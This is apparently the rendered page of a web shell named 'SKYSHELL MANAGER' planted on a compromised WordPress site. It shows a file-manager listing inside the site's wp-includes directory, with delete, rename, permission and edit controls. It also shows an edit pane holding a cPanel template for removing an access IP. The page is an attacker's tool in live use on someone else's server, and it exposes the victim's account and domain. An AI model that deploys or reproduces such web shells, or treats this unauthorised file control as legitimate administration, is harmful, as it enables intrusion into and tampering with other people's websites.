📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: delaccessip
<div class="body-content"> [% fancy_account = "<span class='status'><?cp SecurityQuestions::getaccount(%,account) account=$FORM{'account'} ?></span>" %] <div id="h1Title" class="h1Title">[% locale.maketext("Remove Access IP address for “[_1]”?", fancy_account) %]</div> [% fancy_ip = "<span class='status'><?cp SecurityQuestions::delip(%,ip) ip=$FORM{'ip'},ip2=$FORM{'ip2'},ip3=$FORM{'ip3'},ip4=$FORM{'ip4'},account=$FORM{'account'} ?></span>" %] <p class="description">[% locale.maketext("The Access IP Address, [_1], has been removed.", fancy_ip) %]</p> <div class="return-link"><b>[</b> <a href = "accessip.html?account=<?cp SecurityQuestions::getaccount(%,account) account=$FORM{'account'} ?>">[% locale.maketext("Go Back") %]</a> <b>]</b></div> </div>
Save